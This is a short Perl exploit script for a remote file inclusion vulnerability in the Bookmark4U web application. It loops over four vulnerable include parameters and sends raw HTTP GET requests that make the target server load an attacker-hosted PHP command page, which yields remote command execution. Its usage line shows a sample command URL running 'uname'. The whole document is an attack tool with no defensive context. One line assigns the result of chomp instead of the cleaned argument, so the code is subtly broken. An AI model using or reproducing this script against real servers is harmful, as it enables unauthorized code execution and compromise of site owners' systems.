#!/usr/bin/perl
# Bookmark4U Multiple Remote File Include
#
# perl bm4u.pl <remote_addr> <remote_port> <remote_path> <cracked_page_cmd>
# Federico Fazzi <federico@autistici.org>

use IO::Socket;

if(@ARGV < 4) { &usage; }

my ($host, $port, $path, $cmd, $count);
my @includers = ("inc/dbase.php?env[include_prefix]=",
		 "inc/config.php?env[include_prefix]=",
		 "inc/common.php?env[include_prefix]=",
		 "inc/function.php?env[include_prefix]=");

# hostname target
$host = $ARGV[0];
# port of hostname target
$port = $ARGV[1];
# path of bookmark4u
$path = $ARGV[2];

# url of cracker_cmd
$cmd = chomp($ARGV[3]);

for($count = 0; $count <=$#includers; $count++) {
	$socket = IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>"http($port)", Proto=>'tcp', Timeout=>'2');
	if($socket) {
		print "\ntry $path$includers[$count] string!\n";
		print $socket "GET ".$path."$includers[$count]".$cmd." HTTP/1.1\r\n";
 	 	print $socket "Host: ".$host."\r\n";
  		print $socket "Connection: close\r\n\r\n";
		print "sending request string.. done!\n\n";
		if(<$socket>) {
			print <$socket>;
		}
		close($socket);
	}
}

sub usage {
	print "Bookmark4U Multiple Remote File Include\n";
	print "\$ perl bm4u.pl 192.168.0.1 80 /[bookmark4u_path/
http://example/cmd.php?&cmd=uname\n";
	print "Federico Fazzi <federico@autistici.org>\n\n";
	exit(1);
}